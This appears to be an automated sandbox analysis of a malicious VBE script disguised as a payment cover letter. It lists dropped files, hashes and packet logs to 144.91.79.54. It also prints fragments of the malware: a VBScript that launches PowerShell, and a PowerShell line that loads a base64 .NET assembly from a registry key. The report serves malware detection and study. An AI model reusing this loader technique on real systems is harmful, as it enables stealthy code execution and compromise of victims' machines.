          Preview:...................................FL..................F.".. ...J.S...@.M.1...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S....jQ.1.....1.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.............................^.A.p.p.D.a.t.a...B.V.1......Y....Roaming.@......EW<2.Y....../.....................b$..R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.Y......0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1......Y....Windows.@......EW<2.Y......2.....................^...W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.Y......5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.Y......6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2.Y......7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Y......u...........

          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SOPCD0JK296ZW80O30M3.temp

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:data
          Category:dropped
          Size (bytes):6224
          Entropy (8bit):3.731125910093259
          Encrypted:false
          SSDEEP:48:oLKDPlEtEHAE+3Cy2pU2OHjukvhkvklCywQZkq8IlLnSogZoI5kq8IlLnSogZos1:oeba3CABikvhkvCCtAR8IsHLR8IsHf
          MD5:3C2EE677FC09F047AA97112511330DE3
          SHA1:502C575E4E58E702AB7AC880C79C210E2926D30C
          SHA-256:B244D722CE0AF3FE963F18D24168428E8F62A9B6AB71669AC9F7C0A28539E807
          SHA-512:64867D9A1BDD558F6A636D434CE54DA4E0B51BF481CF2D146E84BC96EF2E13D0148C725FC6CE22A66F47B8428894513CFC70CA9A172C5802DDD53C1060267EE3
          Malicious:false
          Preview:...................................FL..................F.".. ...J.S...@.M.1...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S....jQ.1...O.M.1.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.............................^.A.p.p.D.a.t.a...B.V.1......Y....Roaming.@......EW<2.Y....../.....................b$..R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.Y......0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.Y......2......................x..W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.Y......5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.Y......6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2.Y......7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Y......u...........

          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TU3HXJJAMTQD7V3T16G2.temp

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:data
          Category:dropped
          Size (bytes):6224
          Entropy (8bit):3.732474433509687
          Encrypted:false
          SSDEEP:48:oLrMDPlEtEe6+3Cy2pU2OHjukvhkvklCywQZkJ8IlLnSogZoI5kJ8IlLnSogZos1:oQih3CABikvhkvCCtAe8IsHLe8IsHf
          MD5:D97211E96DCC6262A0606FA8BE27E5AB
          SHA1:3B5B47A4DC5D243D87B9BC95FFE284006CE47CA4
          SHA-256:EAA58EFC01BB482E8EF47DCA5F9DB2C7CD368FE6A2263065A8226E71EB8482E3
          SHA-512:74AF592E7107B3964838AF1CDDF51FCEA8F677FA51F2E1DDBA5E73756A37AF76F5854C18AECA62D3D8E850CFAE04E664F4D243101607803B0D77F175CCBC67DE
          Malicious:false
          Preview:...................................FL..................F.".. ...J.S...@.M.1...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S....jQ.1....i.)2.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.............................^.A.p.p.D.a.t.a...B.V.1......Y....Roaming.@......EW<2.Y....../.....................b$..R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.Y......0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1......Y....Windows.@......EW<2.Y......2.....................^...W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.Y......5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.Y......6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2.Y......7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Y......u...........

          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UCSBMANS2KK7YCR1LEJV.temp

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:data
          Category:dropped
          Size (bytes):6224
          Entropy (8bit):3.7317322934016404
          Encrypted:false
          SSDEEP:48:oLcDPlEtEe6+3Cy2pU2OHjukvhkvklCywQZkJ8IlLnSogZoI5kJ8IlLnSogZos1:ocih3CABikvhkvCCtAe8IsHLe8IsHf
          MD5:B109B50845304BF0443E86598741C1A0
          SHA1:EAF07B0F8A7CBD4BD922A775E2AF871E0FD668A4
          SHA-256:1AEA1B9A42C5DA6CE45979757522981FA07A4A67A87592B97948CD7E473F8C26
          SHA-512:AC20E5923F293DDB2EFBE5E44EBC50DB58D82EBB87742FDC14D38546739D128E13A5370D55A294B7E01E019B3B318B97D874596CDC639099BCA5EA74F4B6EAA9
          Malicious:false
          Preview:...................................FL..................F.".. ...J.S...@.M.1...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S....jQ.1......2.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.............................^.A.p.p.D.a.t.a...B.V.1......Y....Roaming.@......EW<2.Y....../.....................b$..R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.Y......0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1......Y....Windows.@......EW<2.Y......2.....................^...W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.Y......5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.Y......6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2.Y......7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Y......u...........

          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\W8D1M7IG5DUTD8USBM35.temp

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:data
          Category:dropped
          Size (bytes):6224
          Entropy (8bit):3.733029659386897
          Encrypted:false
          SSDEEP:48:/NLGDPlEtEHAE+3Cy2pU2UHjukvhkvklCywQZkq8IlHJnSogZoI5kq8IlLnSogZf:VCba3CATikvhkvCCtAR8I+HLR8IsHf
          MD5:21F351F0A2675229A4B0738194F83411
          SHA1:7D46E16562F7F3EA296CD0EF25A9BAB79FB6D246
          SHA-256:402FA5DD9801C6FD0E7668F6F029223C1F82A0B28E34DDD0DA7F054B95E1CDAB
          SHA-512:5CE735FF1B2E1F74A7BEA179861B39BFC36F3313E158C2E56A22F9DB8F196BBB61C704A27F74F99BC30B1F4B8788B63C335B42A9A4ABE57ECC1406858408F822
          Malicious:false
          Preview:...................................FL..................F.".. ...J.S...C...1...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S....jQ.1...q.(.1.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.............................^.A.p.p.D.a.t.a...B.V.1......Y....Roaming.@......EW<2.Y....../.....................b$..R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.Y......0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.Y......2......................x..W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.Y......5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.Y......6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Y......u...........

          C:\Users\user\AppData\Roaming\mBUojysElnsNYdM.vbs

          Download File
          Process:C:\Windows\System32\wscript.exe
          File Type:ISO-8859 text
          Category:dropped
          Size (bytes):2108
          Entropy (8bit):4.91913253838801
          Encrypted:false
          SSDEEP:48:rJVsWD6IIWZrMnPmklEX/AEdFJJmqgjHjJvRWgqnf9BxZRmzr/u4q:rJVLQk27vYnfVZ2uV
          MD5:48A6B987D0CDE29ACA20F8162A24E89B
          SHA1:44CC5F173979E6CA893F9CB14F6B0C3BFAB0992F
          SHA-256:693D00BDE18E9246EA67B1C6DB570D5092AA1C1A5F48D582E0905C518F7560C2
          SHA-512:00A4E31E5B7A6DB0EA3849D5711F37C431D641BF871BDCBC7E382CD840FC496F4AE12601B7AD10FE64B451532CAA91D79C6B0FDAE93C6A1ECE2057AA2A93EC4B
          Malicious:true
          Preview:Option Explicit.'Nom du projet: mBUojysElnsNYdM.' Initialisation des objets et variables.Dim gestionnaireShell, repertoireSysteme, iteration.Set gestionnaireShell = CreateObject("WScript.Shell").repertoireSysteme = gestionnaireShell.ExpandEnvironmentStrings("%windir%")..' Fonction pour v.rifier l'ex.cution d'un processus.Function ProcessusEstActif(nomDuProcessus). Dim gestionnaireWMI, listeDesProcessus. Set gestionnaireWMI = GetObject("winmgmts:\\.\root\cimv2"). Set listeDesProcessus = gestionnaireWMI.ExecQuery("SELECT * FROM Win32_Process WHERE Name='" & nomDuProcessus & "'"). . ProcessusEstActif = (listeDesProcessus.Count > 0).End Function..' Proc.dure pour ex.cuter des commandes PowerShell.Sub LancerCommandesPowerShell(). Dim listeDesProcessus, processusActif. . ' Ex.cuter PowerShell avec une fen.tre normale. gestionnaireShell.Run repertoireSysteme & "\system32\WindowsPowerShell\v1.0\powershell.exe", 2. . ' Rechercher le processus PowerShell et ex.cu

          \Device\ConDrv

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with very long lines (875), with CRLF line terminators, with escape sequences
          Category:dropped
          Size (bytes):1667
          Entropy (8bit):4.483125413156065
          Encrypted:false
          SSDEEP:48:E/WxZLWxZz5KdTjAX+X5XpXKX/XFXoXQXDX5:E/EZLEZz5KdTj4
          MD5:E4610DC41033A5D84B6CB29A63BFF36E
          SHA1:76974C42E696776D40CE7B87D0E538133742EDBE
          SHA-256:A152836E9B323EB74548AD8F4820D6E80D06C3B8C8AC7D10DFFA36B411212F7C
          SHA-512:F448CA27FA912DCF8E735BD394E324726ECC06E2F4D1BD9C0EB7E3285B7DBD842D48BCF610C6115A3BF193156C5B22D26DB1627BD3382C7B380573C72E7A38BC
          Malicious:false
          Preview:.[91m> .[0m.[93m[.[33m.[45m.[0m.[33m[.[37mAppDomain.[33m]::.[97mCurrentDomain.[33m..[97mLoad.[33m([.[37mConvert.[33m]::.[97mFromBase64String.[33m((.[90m-join.[33m.[45m .[33m(.[93mGet-ItemProperty.[33m.[45m .[90m-LiteralPath.[33m.[45m .[36m'H.[33m.[45m.[0m.[33m.[45m> .[0m.[33m[.[37mAppDomain.[33m]::.[97mCurrentDomain.[33m..[97mLoad.[33m([.[37mConvert.[33m]::.[97mFromBase64String.[33m((.[90m-join.[33m.[45m .[33m(.[93mGet-ItemProperty.[33m.[45m .[90m-LiteralPath.[33m.[45m .[36m'HKCU:\Software\mBUojysElnsNYdM'.[33m.[45m .[90m-Name.[33m.[45m .[36m's'.[33m)..[97ms.[33m.[45m .[33m|.[33m.[45m .[93mForEach-Object.[33m.[45m .[33m{.[92m$_.[33m[.[97m-1.[90m..-.[33m(.[92m$_.[33m..[97mLength.[33m)]})));.[33m.[45m .[33m[.[37ma.a.[33m]::.[97ma.[33m(.[36m'mBUojysElnsNYdM'.[33m).[0mstep 1..etape 2...[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconho.[33m.[45m.[0m.[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconhos.[33m.[45m.[0m.[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconhost

          Static File Info

          General

          File type:data
          Entropy (8bit):3.922228245124172
          TrID:
          • Text - UTF-16 (LE) encoded (2002/1) 64.44%
          • MP3 audio (1001/1) 32.22%
          • Lumena CEL bitmap (63/63) 2.03%
          • Corel Photo Paint (41/41) 1.32%
          File name:01_COVER_LETTER_-_FOR_E_PAYMENT.vbe
          File size:13'758 bytes
          MD5:46a86b1e4d1136f04743b65d4c402b9f
          SHA1:dc17d6fa8bdd838bf37efbbe60b8a169e3f794a3
          SHA256:db7c3bb3fa1311b696574ba3048e627b3ce3298d911a5946972655433be476af
          SHA512:5b7e79943a3d126b9879d34fd0c023e227477cb82b354855a81b4ca8b090d83a83ffbb3a1a7e63e5715ebccad3d42dc2e578ebd20b7fe5e8acf8a842d9d7f0b0
          SSDEEP:384:9ECYUlp+y4DdVWrXDYifV9IG8TLtonspm:2yp+y4ZYv/fAG8TRoom
          TLSH:9F528848CF9E11C2F3216B5A5BCA9AD5173F4D21BB1B4AD1186842C6373ADC0F926F36
          File Content Preview:..#.@.~.^.x.R.o.A.A.A.=.=.v.s.A.i.K.L.H./.2.^.x.k.H.5.9.H.@.#.@.&.}.w.O.r.K.x.P.A.a.w.^.k.m.b.O.@.#.@.&.@.#.@.&.E.P.].W.;.O.b.x.n.P.a...k...m.r.2.m.V.+.~.l.,.2.a.....m.!.O.b.W.U.,.N.!.P./.1.D.b.2.Y.@.#.@.&.j.E.(.P.3.a...m.E.D.n.D.U.m.D.b.2.O.n.M.k...m.r.w

          File Icon

          Icon Hash:68d69b8f86ab9a86

          Network Behavior

          Network Port Distribution

          TCP Packets

          TimestampSource PortDest PortSource IPDest IP
          Aug 29, 2024 18:36:57.801454067 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:57.835228920 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:57.835294008 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:57.835489035 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:57.859859943 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:58.558868885 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:58.559431076 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:58.559469938 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:58.559592962 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:58.561745882 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:58.561758041 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:58.561820984 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:58.563810110 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:58.563821077 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:58.563862085 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:58.566282034 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:58.566293001 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:58.566333055 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:58.570626974 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:58.570683002 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:58.576998949 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:58.579758883 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:58.579837084 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:58.653726101 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:58.654854059 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:58.654864073 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:58.654932976 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:58.665895939 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:58.665909052 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:58.665919065 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:58.665973902 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:58.666027069 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:58.666857004 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:58.666870117 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:58.666904926 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:58.679022074 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:58.679034948 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:58.679105043 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:58.680310965 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:58.680325031 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:58.680341959 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:58.680394888 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:58.721488953 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:58.763782024 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:58.782154083 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.289067030 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.289551973 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.289565086 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.289634943 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.291644096 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.291656971 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.291706085 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.293793917 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.293807030 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.293858051 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.295698881 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.295711994 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.295770884 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.297705889 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.297718048 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.297753096 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.299354076 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.299366951 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.299377918 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.299392939 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.299412012 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.301276922 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.301289082 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.301321983 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.302988052 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.302999973 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.303037882 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.305020094 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.305032015 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.305087090 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.306998014 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.307009935 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.307019949 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.307075024 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.308821917 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.308834076 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.308887959 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.310480118 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.310491085 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.310527086 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.312616110 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.312642097 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.312652111 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.312678099 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.312690973 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.382869005 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.406707048 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.603091002 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.603574991 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.603588104 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.603643894 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.605875015 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.605892897 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.605926991 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.608318090 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.608374119 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.609242916 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.609257936 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.609294891 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.612557888 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.612574100 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.612631083 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.614717007 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.614729881 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.614774942 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.616362095 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.616374016 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.616417885 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.618483067 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.618500948 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.618570089 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.619976997 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.619990110 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.620027065 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.621963024 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.621977091 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.621988058 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.622031927 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.624022961 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.624036074 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.624066114 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.625880957 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.625893116 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.625952959 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.627362967 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.627376080 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.627430916 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.628854036 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.628866911 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.628876925 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.628907919 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.628931999 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.630357981 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.630372047 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.630417109 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.632244110 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.632256031 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.632317066 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.633565903 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.633579016 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.633616924 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.635272026 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.635284901 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.635338068 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.637258053 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.637270927 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.637279987 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.637326002 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.638689041 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.638703108 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.638746023 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.640173912 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.640186071 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.640221119 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.641623974 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.641637087 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.641673088 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.643225908 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.643239975 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.643249989 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.643269062 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.643301010 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.702023029 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.702653885 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.702665091 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.702702999 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.711014986 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.711077929 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.711298943 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.711312056 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.711368084 CEST4971080192.168.2.6144.91.79.54
